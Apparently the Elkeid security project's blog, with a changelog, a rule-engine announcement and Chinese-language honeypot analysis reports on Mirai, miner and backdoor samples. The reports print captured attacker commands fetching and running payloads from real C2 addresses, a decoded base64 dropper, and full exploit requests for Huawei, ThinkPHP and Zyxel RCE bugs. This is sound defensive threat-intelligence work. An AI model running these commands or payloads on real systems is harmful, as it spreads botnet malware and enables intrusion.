Elkeid Blogs

Come See Elkeid at BlackHat

SEE YOU IN SINGAPORE! On going live demo about Elkeid on Black Hat 2023.

Join Us: Date: Friday, May 12 | 12:30pm-1:40pm ( Business Hall, Arsenal Station 4 ) https://www.blackhat.com/asia-23/arsenal/schedule/index.html#elkeid----open-sourced-cloud-workload-protection-platform-30834 blackhat2 blackhat people sg

v1.9.1 ChangeLog

v1.9.1 Released on 2022-12-01

Elkeid Console

  • 增加RASP能力,支持 Java,PHP,Golang,NodeJS,PHP 应用运行时的入侵检测和防护
  • 增加云原生保护能力,支持 k8s 层面入侵检测
  • 增加独立端上病毒扫描能力,支持自定义/快速/全盘扫描
  • 新增基线检测
  • 新增漏洞检测
  • 增加对Agent以及后端服务的运行状况以及资源占用等的监控、告警能力
  • 提供钉钉,飞书,企业微信,邮件等告警消息推送能力,支持按告警等级维度进行告警推送
  • 资产采集
    • 增加常见中间件/应用识别,可以对常见 DB,MQ,Web服务,DevOps工具等进行采集
    • 增加对服务器网卡/磁盘与基础硬件信息采集,增加对内核模块信息采集
    • 增加k8s容器集群相关资产信息的采集
    • 增加对容器信息的收集,同时相关信息会和进程/端口进行关联呈现
    • 进程增加完整性标记
    • 增加“立即扫描”,“立即采集”功能
  • 组件配置及策略优化,支持用户下发自定义客户端插件
  • 增加文件完整性检测能力
  • 首页重构,优化产品表达能力
  • 告警整体展示能力完善,提供更加详尽的告警信息;

Elkeid HUB

  • 新增控制前端,支持前端进行规则配置和更新,project控制,规则debug等功能

Elkeid Server

  • 多处性能优化

Elkeid Agent

  • 多处性能优化
  • 提升在低版本发行版的兼容性和稳定性

Elkeid HUB 社区版发布

Elkeid HUB 是一款由 Elkeid Team 维护的规则/事件处理引擎,支持流式/离线(社区版尚未支持)数据处理。初衷是通过标准化的抽象语法/规则来解决复杂的数据/事件处理与外部系统联动需求。

2022-01-18 16:10 EBWill@灾难控制 局

Elkeid HUB介绍

Elkeid HUB 是一款由 Elkeid Team 维护的规则/事件处理引擎,支持流式/离线(社区版尚未支持)数据处理。初衷是通过标准化的抽象语法/规则来解决复杂的数据/事件处理与外部系统联动需求。

HUB作为通用的规则引擎,对于事件驱动型应用如反欺诈、异常检测、报警等通用场景也可以很好的进行应用。HUB支持流式数据和离线数据的输入,支持流批一体,可以对输入的数据根据规则进行处理,并输出结果。支持插件编写,对数据处理的全流程(修改、检测、响应)均可自定义实现,有很高的通用性。下图为HUB整体能力图,需要注意的是红色框内部分为社区版不支持的功能,仅商业版支持。

Elkeid HUB 社区版是在 Elkeid 团队内部版本的基础上,移除了集群控制能力但强化了单机易用性,且保留了核心流处理能力和插件功能的版本。社区版旨在开箱即用,本身不依赖任何组件,可以对小批量流式数据进行处理,如果需要集群部署和规则在线编辑以及热更新/运维/多人协作/CEP/前端等能力,请考虑商业版来实现更加完善的功能和支持。

Elkeid HUB使用场景

案例1 - 简单的主机入侵检测场景

通过策略对端上采集数据进行分析检测可疑/恶意行为,后将检出数据推送到安全中心。

案例2 - 其他入侵检测场景

原始数据通过黑名单检测/白名单过滤/数据补充(如:CMDB,威胁情报等)/预定义告警处理(如:其他具备阻断能力的安全产品等)并将告警推送Bot与安全中心等工作。

案例3 - 多输入/输出场景

用户可以通过SmithDSL来轻松实现自定义数据流,根据不同场景下的需求来进行编排。

Elkeid HUB 优势

  • 高性能
  • 外部依赖极少,开箱即用
  • 支持复杂数据处理
  • 插件支持
  • 支持有状态逻辑
  • 支持外部系统/数据联动
  • 统一且简单的语法,可以让策略同学更专注于策略本身而无需考虑引擎本身
  • 易上手,简单场景下可以实现0代码即可完成需求

Elkeid HUB 最佳实践

Elkeid HUB 作为 Elkeid Team 的数据处理/规则引擎部分,在内部主要有以下几种用途:

内部使用 Elkeid HUB 处理 Elkeid HIDS/RASP/Sandbox 原始数据,TPS 9千万/秒。HUB 调度实例 4000+

内部维护规则2000+

内部 99% 告警产生时间 小于 0.5s

开源少量 Elkeid 入侵检测策略

此次开源策略以示例为主,选取了几种比较具有代表性的策略便于大家更好的理解学习HUB的策略编写。这部分规则仅能工作在 Elkeid 数据流下。

  • hidden_module_detect: Hidden Kernel Module Detected

  • bruteforce_detect: Bruteforce From Single/Multiple Source

  • binary_file_hijack_detect: Common Binary File Hijacking Detection

  • user_credential_escalation_detect: Privilege Escalation Detection

  • reverse_shell_detect: Reverse Shell With Connection

  • pipe_shell_detection: Double Piped Reverse Shell Detection

GitHub Repo

https://github.com/bytedance/Elkeid-HUB

LICENSE (Not Business Friendly)

https://github.com/bytedance/Elkeid-HUB/blob/main/LICENSE

Contact us && Cooperation

社区版与商业版差异

Elkeid HUB 与 Elkeid 策略 商业版咨询 elkeid@bytedance.com

Elkeid 蜜罐样本分析报告

Botnet

简介:x86_64样本属于Mirai样本家族中的一员,主要感染各类IoT设备构建大规模僵尸网络

关键词:x86_64 Mirai

简介: Saitama样本为Mirai变体,主要利用RCE漏洞传播构建僵尸网络并进行DDos攻击。

关键词:Saitama Mirai

简介:该样本为Mirai变体,主要感染各类IoT设备构建大规模僵尸网络

关键词:0xt984767.sh 0x83911d24Fx.sh Mirai

简介:catvsdog是Mirai的启动脚本,会下载执行Mirai,主要建大规模僵尸网络进行DDos攻击。Mirai由于代码开源,不断产生了多种变体,往往与0/N-Day漏洞利用结合,具有很强的感染性。

关键词:catvsdog.sh Mirai 0xt984767.sh meow.x86

简介:该样本回连IP与Mirai 变体样本具有强关联,推测为Mirai变体之一

关键词:x86.sh Mirai

简介:该样本为tsunami 族内样本,属于僵尸网络类型的样本

关键词:tsunami x001804289383 tsh

简介:catvsdog是Mirai的启动脚本,会下载执行Mirai,主要建大规模僵尸网络进行DDos攻击。Mirai由于代码开源,不断产生了多种变体,往往与0/N-Day漏洞利用结合,具有很强的感染性。

关键词:dota.tar.gz X17-unix

简介:arhivehaceru_Update为botnet样本,下载自arhivehaceru.com域名,感染主机后构建僵尸网络,可发动DDos攻击。

关键词:./History arhivehaceru

简介:yy.py样本执行了ssh登陆后通过vim编辑的yy.py文件。同时行为集合中存在/root/pty样本的关联行为,该样本与僵尸网络和挖矿有关

关键词:yy.py x001804289383

简介:yy.py样本执行了ssh登陆后通过vim编辑的yy.py文件。同时行为集合中存在/root/pty样本的关联行为,该样本与僵尸网络和挖矿有关

关键词:smofpieenq

简介:Oblivion121样本为gafgyt样本关联脚本,利用Shellshock 漏洞进行分发。用于连接硬编码的 C&C 地址。

关键词:Oblivion x001804289383

Miner

简介:Cleanfda是一种挖矿木马,通常会通过未授权命令执行漏洞攻击目标主机,并利用SSH爆破等方式呈蠕虫式传播。

关键词:cleanfda newinit.sh is.sh

简介: robertreynolds2是github上的一个挖矿样本

关键词:robertreynolds2

简介:该样本ssh登陆后针对hive os挖矿平台进行操作,设置用户密码并关闭开放服务减少暴露。猜测可能为批量扫描暴露的矿机进行利用。

关键词:i2gji23g4jigh3gji4hggij345hgh

简介:该样本通过ssh登录后,存在一系列修改定时任务,清除挖矿竞品,重命名系统命令的行为,具有较强的挖矿样本的特征

关键词:download.sh .mm.jpg x001804289383

简介: 该样本通过ssh登录后,存在一系列修改定时任务、清除挖矿竞品、读取系统信息的行为,根据不同系统架构执行脚本,具有较强的挖矿样本的特征

关键词:b4ngl4d3shS3N941 .billgates spreader

简介:hoze样本为挖矿样本,感染x86_64主机,通过多个样本/脚本链式启动,并且会及时清理自身痕迹,还会进行添加用户、密码、公钥等持久化行为

关键词:hoze secure

简介:该样本通过ssh暴破登录后,存在一系列修改定时任务,清除挖矿竞品,重命名系统命令的行为,具有较强的挖矿样本的特征.

关键词:httpss .sh

简介:该样本通过ssh暴破登录后,存在一系列更改用户密码,添加用户,重命名系统命令的行为,具有较强的挖矿样本的特征.

关键词:x86_64 ec2-user binfmt_misc

简介: ssh暴破登录后,xmrig样本被远程下载并执行,是被广泛使用的挖矿样本

关键词:xmrig networkxm install_xm

简介:ssh暴破登录后,minerus样本被下载并执行,具备挖矿样本特征。

关键词:minerus cnrig

简介:ssh暴破登录后,diicot样本通过arhivehaceru.com被下载并执行,具备挖矿样本特征。

关键词:diicot arhivehaceru Opera

简介: ssh暴破登录后,kthreads样本被下载并执行,预备连接特定矿池进行挖矿,具备挖矿样本特征。

关键词:kthreads pool.hashvault.pro

简介:ssh暴破登录后,c3pool_miner样本从download.c3pool.org远程下载并执行,是被广泛使用的挖矿样本

关键词:setup_c3pool_miner protocoldetect

简介:ssh暴破登录后,payload样本通过arhivehaceru.com被下载并执行,具备挖矿样本特征。

关键词:payload arhivehaceru

Backdoor

简介:g6h7是一系列相似名称后门类型的样本的简称,会根据不同的系统执行不同的后门程序,如 g6h7.arm,g6h7.wrt等

关键词:g6h7

简介:样本关联IP频繁通过暴力破解或窃取的凭据执行 SSH 攻击,通过蜜罐采集行为可知,攻击者在ssh登陆成功后会进行信息收集、修改ssh公钥与系统用户密码。并且在蜜罐中执行行为的时间间隔分布均匀,应为攻击脚本。

关键词:nS97pp7fcZ1qu

简介:该样本行为特征中,存在访问恶意IP,文件删除等行为,推测为通过ssh爆破进入的后门样本

关键词:49.142.208.62

简介:该样本行为特征中,存在访问恶意IP,加载内核模块,建立后门等行为,与gates后门样本有相似行为,推测为通过ddos进入的后门样本

关键词:S97DbSecuritySpt bsd-port

简介:messages是一种未知恶意样本,推测为后门。

关键词:messages

ssh暴破后执行

简介:该样本行为特征中,存在访问恶意IP,文件删除等行为,推测为通过ssh爆破进入的后门样本

  • ifjeeisurofmioufiose
  • finalshell_separator
  • wtmp.honeypot,secscan
  • alternatives,[Mm]iner
  • ns3.jpg,oto,sos.vivi.sg
  • nS97pp7fcZ1qu
  • games, x
  • BC20mxv7lX91

简述

Saitama样本为Mirai变体,主要利用RCE漏洞传播构建僵尸网络并进行DDos攻击。Saitama样本作为Mirai变体,会感染大量IoT设备,并向指定目标发起DDos攻击,利用RCE漏洞进行传播,并容易导致网络瘫痪。

elkeid 样本ID

  • elkeid_20220424_botnet_2

捕获时间

  • 20220424

最近活跃时间

  • 20221118

已知入侵途径

  • 弱口令爆破
  • RCE利用

涉及样本

执行目录

  • /tmp
  • /var/run
  • /mnt
  • /root
  • /

样本

  • Saitama.sh
  • tSaitama.sh
  • tSaitama2.sh
  • Saitama1.sh
  • Mirai
  • Saitama121.x86
  • Saitama121.ppc
  • Saitama121.mpsl

主要行为

  • ssh行为

    • bash -c yum install wget -y;
    • bash -c cd /tmp cd /var/run cd /mnt cd /root cd /;
    • wget http://2.56.59.196/Saitama.sh;
    • curl -O http://2.56.59.196/Saitama.sh;
    • chmod 777 Saitama.sh;
    • sh Saitama.sh;
    • tftp 2.56.59.196 -c get tSaitama.sh;
    • chmod 777 tSaitama.sh;
    • sh tSaitama.sh; tftp -r tSaitama2.sh -g 2.56.59.196; chmod 777 tSaitama2.sh; sh tSaitama2.sh; ftpget -v -u anonymous -p anonymous -P 21 2.56.59.196 Saitama1.sh Saitama1.sh; sh Saitama1.sh; rm -rf Saitama.sh tSaitama.sh tSaitama2.sh Saitama1.sh; rm -rf *
  • 启动脚本行为

    • 下载恶意文件

      • cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://2.56.59.196/bins/Saitama121.x86; curl -O http://2.56.59.196/bins/Saitama121.x86;
    • 恶意文件重命名

      • cat Saitama121.x86 >cp;
    • 赋权与执行

      • chmod 777 *;./cp ssh
  • 恶意文件行为

    • Setsid
    • 向大量ip地址的80端口与37215端口发送POST/GET请求

IOC

URLsha256
http://2.56.59.196/bins/Saitama121.spcSaitama121.spc:8640212124000fd6a88e4147c49e09e681aaead8c9b6756215f7ff2271d4b6cc
http://2.56.59.196/bins//Saitama121.arm7Saitama121.arm7:192ac3d719930d52b3a2923bdcb18ff88eb58644afe7f20fda5c578c4c08e812
http://2.56.59.196/bins/Saitama121.sh4Saitama121.sh4: 822476f603a7c8b26a426fae3d4463509eebaa714a116ab02260a4af8de8a27d
http://2.56.59.196/bins/Saitama121.m68kSaitama121.m68k:b6be4529f5ad301a331aaf7b37b455e48c8d14204ede8d34f41159d7cf19240b
http://2.56.59.196/bins/Saitama121.mpslSaitama121.mpsl:fdec1f038fdba45ba380ebeb970c30203afffd4862dc7e51080c542ea6e0dcee
http://2.56.59.196/bins/Saitama121.arm6Saitama121.arm6:b3323a5bba07180281870cd79e77f69a2d8b448d81af5c84ad145b73c33d3b34
http://2.56.59.196/bins/Saitama121.ppcSaitama121.ppc:2905d677ad42d8690e9dbad8daa5cc51fa77b9a43d7065121e626c52de283243
http://2.56.59.196/bins/Saitama121.x86Saitama121.x86:2835029b31d5f674c0ac48da199aedd2dce59e5d4814ca5c4041ca86213144df|
http://2.56.59.196/bins/Saitama121.mipsSaitama121.mips:2497439848f5a3ca782f66342b8becf7d6f60ef436683e648b7df4c87fc3dc13
http://2.56.59.196/bins/Saitama121.arm5Saitama121.arm5:e389702b7194c5c62d0cf23617cd54694f97dd25ca6fccd1daa19f0eee08746a
Saitama.sh:a30ff63dc4951d23a690906117e0ce4516d3710ca68cd4c1cc1b2f69bfbf36b2
Saitama121.arm:920b5dc483b4d0773bbc753f190dba5384f5683f85a719d70da16013cc6ab2f1

已知情报

  • https://maltiverse.com/ip/2.56.59.196
  • https://www.virustotal.com/gui/url/ad3ca5bff5558c8165c237c85ff43b5c0ce19c2c82687295f8af2c0637211509
  • 与Mirai关联

二进制行为分析(沙箱执行结果)

文件云查杀结果

Saitama121.x86:2835029b31d5f674c0ac48da199aedd2dce59e5d4814ca5c4041ca86213144df

https://internal only/search/result/2835029b31d5f674c0ac48da199aedd2dce59e5d4814ca5c4041ca86213144df

sandbox任务:

{

            "task_id": "mj_2835029b31d5f674c0ac48da199aedd2dce59e5d4814ca5c4041ca86213144df_test",
            "init_script": "`internal only`",
            "desc": "",
            "files": {
                "Saitama121.x86": "2835029b31d5f674c0ac48da199aedd2dce59e5d4814ca5c4041ca86213144df"
            },
            "url": "https://`internal only`/obj/eden-cn/ubqnpieh7ubqht/malware/",
            "path": "/var/tmp",
            "timeout": 30,
            "task_timeout": 10,
            "recursive": false,
            "task_type": "malware",
            "callback": ""
}

样本变体

不同来源的Saitama.sh

样本sha256区别Honeypot捕获
http://136.144.41.55/Saitama.sh977bba207cafa8ad195c7b3c23411bb514dcec5dfc1367e07f1adb5a6672430fip: 136.144.41.55样本启动参数: ./cp x86, ./cp mips, ./cp arm, ......
http://2.56.59.196/Saitama.sha30ff63dc4951d23a690906117e0ce4516d3710ca68cd4c1cc1b2f69bfbf36b2ip: 2.56.59.196样本启动参数: ./cp ssh

不同文件名的启动脚本

样本sha256区别Honeypot捕获
http://136.144.41.55/wget.shbaebca2e198f7371a9b28d71cbee57009188c857b62d0143400aa113a8cb316d样本启动参数: ./cp exploit.multi
http://136.144.41.55/Saitama.sh977bba207cafa8ad195c7b3c23411bb514dcec5dfc1367e07f1adb5a6672430f样本启动参数: ./cp x86, ./cp mips, ./cp arm, ......
http://2.56.59.196/multiuwu.sh3320cfed5e6e7edef694ef5c92bd913fff3aeb1525d8b77dcec1048b14e85846暂无样本

不同后缀的saitama elf文件对比

通过查看strings及行为报告可知,不同后缀的saitama elf文件功能一致,适配不同平台。

不同ip来源的saitama.x86对比

仅硬编码的ip地址不同,如下

样本sha256区别Honeypot捕获
http://136.144.41.55/bins/Saitama121.x86afa21c242fa6af1dd5fac9f5c02eddedb73bb134fbba560a77a6b61799eea463硬编码的C2地址为136.144.41.55
http://2.56.59.196/bins/Saitama121.x862835029b31d5f674c0ac48da199aedd2dce59e5d4814ca5c4041ca86213144df硬编码的C2地址为2.56.59.196

历史来源与关联组织

作为主要感染物联网设备构建僵尸网络的Mirai变体,Saitama121.* 的strings同样存在在已在多种Mirai样本中出现的特征字符

Self Rep Fucking NeTiS and Thisity 0n Ur FuCkInG FoReHeAd We BiG L33T HaxErS

,但相比于部分存在作者签名的Mirai样本,elkeid honeypot此次捕获的所有样本中并没有明确的作者信息。在https://www.malwarebytes.com/blog/threat-intelligence/2022/05/apt34-targets-jordan-government-using-new-saitama-backdoor报道了来自伊朗APT组织APT34的同名恶意文件——saitama后门,尚不确定与本样本是否存在关联。

样本静态分析

通过样本strings发现该样本携带3种RCE漏洞进行利用,分别为:

  • 针对华为家用路由器的CVE-2017-17215

  • 针对ThinkPHP的CVE-2018-20062

  • 针对Zyxel的CVE-2017-18368

样本strings包含

POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 193.239.147.201 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>

,其中HuaweiHomeGateway表明该样本针对华为家用路由器,同时样本行为中对大量ip的37215端口发起请求也可以印证。一旦RCE漏洞利用成功, 即执行/bin/busybox wget -g 193.239.147.201 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips,推测下载执行的文件同样为Mirai样本。

样本strings包含

GET /index.php?s=/index/
hink
pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: Uirusu/2.0

,表明样本可进行thinkphp的RCE漏洞利用,此外特殊的User-Agent(Uirusu/2.0)也在许多针对Nginx代理服务器的僵尸网络攻击中出现。

样本strings包含

POST /cgi-bin/ViewLog.asp HTTP/1.1
Host: 192.168.0.14:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.20.0
Content-Length: 227
Content-Type: application/x-www-form-urlencoded
 /bin/busybox wget http://193.239.147.201/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

表明样本可进行zyxel相关网络设备的RCE漏洞利用。

安全配置建议

  • 梳理资产信息,修复CVE-2017-17215、CVE-2018-20062和CVE-2017-18368等相关系统漏洞

  • 不使用弱密码或默认密码

参考链接

https://cujo.com/mirai-gafgyt-with-new-ddos-modules-discovered/

https://www.radware.com/security/ddos-threats-attacks/threat-advisories-attack-reports/hoaxcalls-evolution/

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17215

https://github.com/lcashdol/Exploits/blob/master/HuaweiHomeDeviceUpgrade.txt

https://www.reddit.com/r/selfhosted/comments/kxiq7y/possible_botnet_targeting_nginx_proxy_manager/

http://blog.nsfocus.net/ryuk-botnet/

简述

x86_64样本属于Mirai样本家族中的一员.Mirai是运行 Linux 的暴露网络设备的僵尸网络病毒.

类型

僵尸网络,后门

elkeid 样本ID

elkeid_20220508_botnet_1

捕获时间

  • 2022-05-08

最近活跃时间

  • 2022-11-18

已知入侵途径

  • 弱口令爆破

涉及样本

  • x86_64
  • Mirai

主要行为

  • 下载并赋权

    • wget http://2.56.56.182/x86_64;
    • chmod 777 *;
  • 执行x86_64样本文件

    • ./x86_64 x86
  • 监听6628端口

  • 访问viewdns.net

排查与清理

    1. 请先确认该文件是否为测试文件 2. 如果非业务行为请通过root登陆,并清理【rm】下载的文件 3. 请结合从属事件内的关联告警以及机器上其他告警事件来作为上下文来判断入侵入口来源与受影响范围,重点关注该恶意文件修改和创建

IOC

SHA256:

  • /tmp/x86_64.1: 092b83eb993f591082d9fcfebdb3b7ccc727087e9f7573530c7b028a6bfc820e
  • /tmp/x86_64: 4eb6e61578f0e958502fdc6646ec40878ae0006c3033c50219181796e686311e

回连IP

  • 2.56.56.182

攻击IP

URL

  • http://2.56.56.182/x86_64viewdns.netddns.net

样本变体

Mirai

  • https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
  • Mirai 是首批针对运行 Linux 的暴露网络设备的僵尸网络病毒。 由 MalwareMustDie 于 2016 年 8 月发现,其名称在日语中意为“未来”。 如今,它的目标是广泛的联网嵌入式设备,例如家庭路由器和其他物联网设备。 由于源代码在Hack Forums上发布,出现了许多 Mirai 家族的变体。

参考链接

/tmp/x86_64.1

  • https://www.virustotal.com/gui/file/092b83eb993f591082d9fcfebdb3b7ccc727087e9f7573530c7b028a6bfc820e

2.56.56.182

  • https://www.virustotal.com/gui/url/8b73719a3d9d3ecc584aa303c8a05dbe2995c07aa2c56fd531e0f8e81c4e5386
  • https://threatintelligence.guardicore.com/ip/159.223.210.221

Elkeid-20220728-botnet-4 (catvsdog样本) 分析报告

简述

catvsdog是Mirai的启动脚本,会下载执行Mirai,主要建大规模僵尸网络进行DDos攻击。Mirai由于代码开源,不断产生了多种变体,往往与0/N-Day漏洞利用结合,具有很强的感染性。

样本类型

僵尸网络, 木马下载器

elkeid 样本ID

elkeid_20220728_botnet_4

捕获时间

  • 2022-07-28

最近活跃时间

  • 2022-11-18

已知入侵途径

  • 弱口令爆破

涉及样本

执行目录

  • /tmp
  • /var/run
  • /mnt
  • /root
  • /

样本

  • catvsdog.sh
  • 0xt984767.sh
  • meow.x86
  • meow.mips
  • meow.mpsl
  • meow.arm
  • meow.arm5
  • meow.arm6
  • meow.arm7
  • meow.ppc
  • meow.m68k
  • meow.sh4
  • meow.spc
  • meow.arc
  • meow.x86_64

主要行为

  • 下载启动脚本并赋权限执行
    • wget http://37.187.87.141/catvsdog.sh;chmod 777 catvsdog.sh;
    • tftp 37.187.87.141 -c get 0xt984767.sh;
    • sh catvsdog.sh
  • 启动脚本行为
    • 下载恶意文件
      • cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://37.187.87.141/MeowBins/meow.x86; curl -O http://37.187.87.141/MeowBins/meow.x86;
    • 恶意文件重命名
      • cat meow.x86 >meow
    • 赋权与执行
      • chmod +x *;./meow meow.Selfrep.x86

IOC

  • URL

    • http://37.187.87.141/catvsdog.sh
    • http://37.187.87.141/MeowBins/meow.x86(其他系统架构:meow.arm、meow.arm5、meow.arm6、meow.arm7、meow.68k、meow.sh4、meow.arc、meow.x86、meow.mips、meow.mspl、meow.spc)
  • SHA256

    • 69ea0d7139a5b7b67c1034856ec9215751edf251a00c5f523b77566c3b03c3cd
    • 4eaf68fa5363a97f243967b0d7e7f9e02875add6786fbb7c034b437b2e3022f4
    • ab93fc87e091762436f0fb0e5ff2587ce03a20874a4bf00788885fd88cf76247
    • 6269847b87cc4346d49767285fdf0d88c2d10b7786cd0735e76e8d4d163d74c6
    • 6d4a771a7d67f69700adc7a7b0c39c793f1a616874c893c5b6ef67026b25e11b
    • 63d7dc39dc34e6621379251315656432220addacf55904d7ebab78e45e4b77d5
    • 4114ada128539c0a2c1d2c5e9b6d5ef6ae1be440d4894aa2b7c5bed11abcc327
    • 423e1d75b90c3f8fe2bd40eadeb95cb9de02515b77066e7d1f5b22eeea47924e
    • a016021ca1b059b12243e197d10591e932dc63d20425d0ced6f1b0017aec2cbd
    • 36b596ab445848beb642dc85a17728d4023de6dc989300272072b7ea7fad6669
  • 攻击IP

    • 51.89.232.15
    • 145.239.11.75
    • 51.161.116.88
    • 54.39.107.123
    • 54.36.123.35
    • 51.89.194.93
    • 51.79.78.180
    • 51.79.98.76
    • 145.239.11.79
    • 54.37.83.165
    • 51.79.80.117
    • 54.37.80.220
    • 54.36.122.190
    • 51.68.204.182
    • 51.77.118.10
    • 54.37.80.227
    • 51.77.116.67
    • 54.36.120.229
    • 51.79.98.34
    • 51.89.194.160
    • 51.79.78.192
    • 54.39.49.96
    • 51.89.219.132
    • 145.239.11.62
    • 51.89.219.195
    • 51.77.118.44
    • 149.56.26.37
    • 145.239.11.61
    • 145.239.7.213
  • 回连ip

37.187.87.141

排查建议

  • 请先确认该文件是否为测试文件
  • 如果非业务行为请通过root登陆,并清理【rm】下载的文件
  • 排查 .bashrc .bash_profile .profile 系统启动项 crontab 等是否有被驻留,并做清理

参考链接

  • 69ea0d7139a5b7b67c1034856ec9215751edf251a00c5f523b77566c3b03c3cd
    • https://www.virustotal.com/gui/file/69ea0d7139a5b7b67c1034856ec9215751edf251a00c5f523b77566c3b03c3cd
  • 4eaf68fa5363a97f243967b0d7e7f9e02875add6786fbb7c034b437b2e3022f4
    • https://www.virustotal.com/gui/file/4eaf68fa5363a97f243967b0d7e7f9e02875add6786fbb7c034b437b2e3022f4
  • https://threatintelligence.guardicore.com/ip/37.187.87.141

elkeid_20220809_botnet_3(bin样本)分析报告

简述

样本类型

  •   僵尸网络,后门

elkeid 样本ID

elkeid_20220809_botnet_3

捕获时间

  • 20220806

最近活跃时间

  • 20221207

已知入侵途径

  • 弱口令爆破
  • Spring4Shell等漏洞批量利用

涉及样本

  执行目录

  • /tmp
  • /var/run
  • /mnt
  • /root
  • /

  样本

  • 0x83911d24Fx.sh 启动脚本
  • 0xt984767.sh
  • 0xft6426467.sh
  • 0xtf2984767.sh
  • binx86 Mirai家族木马
  • binmips
  • binmpsl
  • binarm
  • binarm5
  • skidnigger

主要行为

  • 下载

curl -O http://208.67.105.241/0x83911d24Fx.sh;

  • 赋权

chmod 777 0x83911d24Fx.sh;

  • 执行

sh 0x83911d24Fx.sh

  • 清理样本

rm -rf 0x83911d24Fx.sh binarc binarm binarm5 binarm6 binarm7 binm68k binmips binmpsl binppc binsh4 binspc binx86 binx86_64

IOC

  • sha256

84186e9f210fcf4c68480201439918f0fa15226cad23455e18024b809eb3ad69

  • 回连IP

208.67.105.241

样本变体

参考链接

  • https://www.hybrid-analysis.com/sample/84186e9f210fcf4c68480201439918f0fa15226cad23455e18024b809eb3ad69
  • https://www.virustotal.com/gui/file/84186e9f210fcf4c68480201439918f0fa15226cad23455e18024b809eb3ad69/detection/f-84186e9f210fcf4c68480201439918f0fa15226cad23455e18024b809eb3ad69-1646679145
  • https://malshare.com/sample.php?action=detail&hash=943b5df6ef75c8e0ce56461f61eb9113
  • https://urlhaus.abuse.ch/browse.php?search=http%3A%2F%2F37.0.8.217
  • https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/MIRAI/

简述

dota样本是一个活跃多年的恶意样本族,通常使用凭据字典攻击SSH服务器,成功后,进行收集系统信息,持久化登录,劫持服务器资源等一系列行为,elkeid蜜罐于20221104收集到它的dota.tar.gz样本.

样本类型

僵尸网络,挖矿

elkeid 样本ID

elkeid_20221109_botnet_7

捕获时间

20221109

最近活跃时间

20221114

关键词

dota.tar.gz,X17-unix

已知入侵途径

  • 弱口令爆破

涉及样本

  • dota.tar.gz

主要行为

  • 收集系统信息

    • bash -c cat /proc/cpuinfo | grep model | grep name | wc -l
    • bash -c free -m | grep Mem | awk {print $2 ,$3, $4, $5, $6, $7}
    • bash -c lscpu | grep Model
  • 执行

    • bash -c sleep 15s && cd /var/tmp; echo IyEvYmluL2Jhc2gKY2QgL3RtcAkKcm0gLXJmIC5zc2gKcm0gLXJmIC5tb3VudGZzCnJtIC1yZiAuWDEzLXVuaXgKcm0gLXJmIC5YMTctdW5peApta2RpciAuWDE3LXVuaXgKY2QgLlgxNy11bml4Cm12IC92YXIvdG1wL2RvdGEudGFyLmd6IGRvdGEudGFyLmd6CnRhciB4ZiBkb3RhLnRhci5negpzbGVlcCAzcyAmJiBjZCAvdG1wLy5YMTctdW5peC8ucnN5bmMvYwpub2h1cCAvdG1wLy5YMTctdW5peC8ucnN5bmMvYy90c20gLXQgMTUwIC1TIDYgLXMgNiAtcCAyMiAtUCAwIC1mIDAgLWsgMSAtbCAxIC1pIDAgL3RtcC91cC50eHQgMTkyLjE2OCA+PiAvZGV2L251bGwgMj4xJgpzbGVlcCA4bSAmJiBub2h1cCAvdG1wLy5YMTctdW5peC8ucnN5bmMvYy90c20gLXQgMTUwIC1TIDYgLXMgNiAtcCAyMiAtUCAwIC1mIDAgLWsgMSAtbCAxIC1pIDAgL3RtcC91cC50eHQgMTcyLjE2ID4+IC9kZXYvbnVsbCAyPjEmCnNsZWVwIDIwbSAmJiBjZCAuLjsgL3RtcC8uWDE3LXVuaXgvLnJzeW5jL2luaXRhbGwgMj4xJgpleGl0IDA= | base64 --decode | bash
    • 注:以下为decode内容:
    • #!/bin/bash
    • cd /tmp
    • rm -rf .ssh
    • rm -rf .mountfs
    • rm -rf .X13-unix
    • rm -rf .X17-unix
    • mkdir .X17-unix
    • cd .X17-unix
    • mv /var/tmp/dota.tar.gz dota.tar.gz
    • tar xf dota.tar.gz
    • sleep 3s && cd /tmp/.X17-unix/.rsync/c
    • nohup /tmp/.X17-unix/.rsync/c/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 192.168 >> /dev/null 2>1&
    • sleep 8m && nohup /tmp/.X17-unix/.rsync/c/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 172.16 >> /dev/null 2>1&
    • sleep 20m && cd ..; /tmp/.X17-unix/.rsync/initall 2>1&
    • exit 0
  • 更改密码并保存至up.txt

    • bash -c echo dropbox\n0wE4NvqjqoFq\n0wE4NvqjqoFq\n|passwd > /tmp/up.txt
    • /bin/bash -c echo dropbox:dropbox | chpasswd
  • 初始化XMRig,并扫描网段

